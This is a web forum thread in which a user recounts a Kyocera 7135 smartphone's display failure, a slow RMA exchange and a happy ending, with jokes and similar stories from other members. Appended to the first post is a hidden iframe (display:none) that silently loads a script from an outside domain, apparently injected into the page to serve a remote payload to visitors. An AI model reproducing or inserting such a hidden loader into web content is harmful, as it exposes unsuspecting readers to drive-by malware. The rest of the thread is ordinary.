+ Reply to Thread
Results 1 to 9 of 9
  1. #1
    Registered User
    Join Date
    12-12-2002
    Posts
    55

    Failing display blues. (and purples)

    Tuesday afternoon I opened the screen on my trusty 7135 to find that all the white had been replaced by purple static.

    Wiggling the hinge a bit made it go away. Then it came back. Now all of the colors are wrong. Sometimes pressing on the hinge makes it happier. For a minute or two.

    Soft reset has no effect. Neither does a hard one. It's acting like the display cable in the hinge has come loose.

    I have the warranty repair sheet from Alltel where they say 'this process will allow Kyocera to ship a new phone to your door within 24 hours'

    Don't believe it.

    Called Kyo for a RMA. They take my info and then put me on hold for about 15 min. Then he gives me an RMA number and tells me to ship the 7135 to them for repair.

    :eek2


    I tell him that won't work. I depend on the 7135 and I need to swap it for a good unit.
    He puts me on hold again. When he comes back, he says that's possible, but they'll need to put a $770.00 authorization against my credit card. Wincing, I agree.

    He says to call back that afternoon to get a tracking number.

    I call. It hasn't gone out. "It'll go out tomorrow."

    Now it's tomorrow. My credit card gets hit with the authorization but that's ok, because it means the new unit's on the way. I call to get the tracking number.

    It hasn't gone out. The person I spoke to didn't know when it would ship. :eyecrazy

    I'm hoping the screen holds out long enough. And backing up regularly.

    Further bulletins as events warrant.
    (insert scream here)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    (XXX) XXX-XXXX aka.bugle's Avatar
    Join Date
    01-22-2002
    Posts
    109
    Lets hope they learn something when they get yours in for repair ... Can we give your phone a name so that we may refer to it and maybe ask kyocera later on ..." what ever happened to LTL's 7135, you know, RMA#purplestatic"

  3. #3
    Registered User
    Join Date
    12-12-2002
    Posts
    55
    Kyo called today and a replacement kit is on its way. FedEx shows it leaving San Diego, CA.

    I'm going to be awful glad to see that FedEx guy...

  4. #4
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    ...perhaps even give him a hug? :drink3

  5. #5
    Registered User kniteman's Avatar
    Join Date
    03-12-2003
    Location
    Willis, TX
    Posts
    437
    Just another one of the many advantages of being an early user!

    :biglaughc :eyesroll
    Remember, When the long night comes return to the end of the beginning.

  6. #6
    poked back in
    Join Date
    11-19-2002
    Location
    Redmond, WA
    Posts
    358
    When the display on my Visor went nuts, I called Handspring. They sent a replacement one, and if I didn't send the old one back in the same box in 7 days I'd be charged full price for it. I returned it the next day

  7. #7
    Registered User
    Join Date
    12-12-2002
    Posts
    55
    No, I didn't hug the FedEx guy.

    But I did accept the package.

    One shiny-new 7135. An ESN swap and restore with AdvBackup and I am back in business!

    (during the ESN swap the Verizon CS rep remarked. "You sure know a lot about this stuff. I should have you train some of our techs")

    Kyo apologized for the delay in shipping and sent a prepaid return box for my old unit.

    **Happiness**

  8. #8
    Registered User
    Join Date
    12-12-2002
    Posts
    55
    Another note. My new unit has the same software versions as the old one (MZ1.0.27/SZ1.0.13)

  9. #9
    Registered User
    Join Date
    12-04-2002
    Posts
    52
    I love a happy ending.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts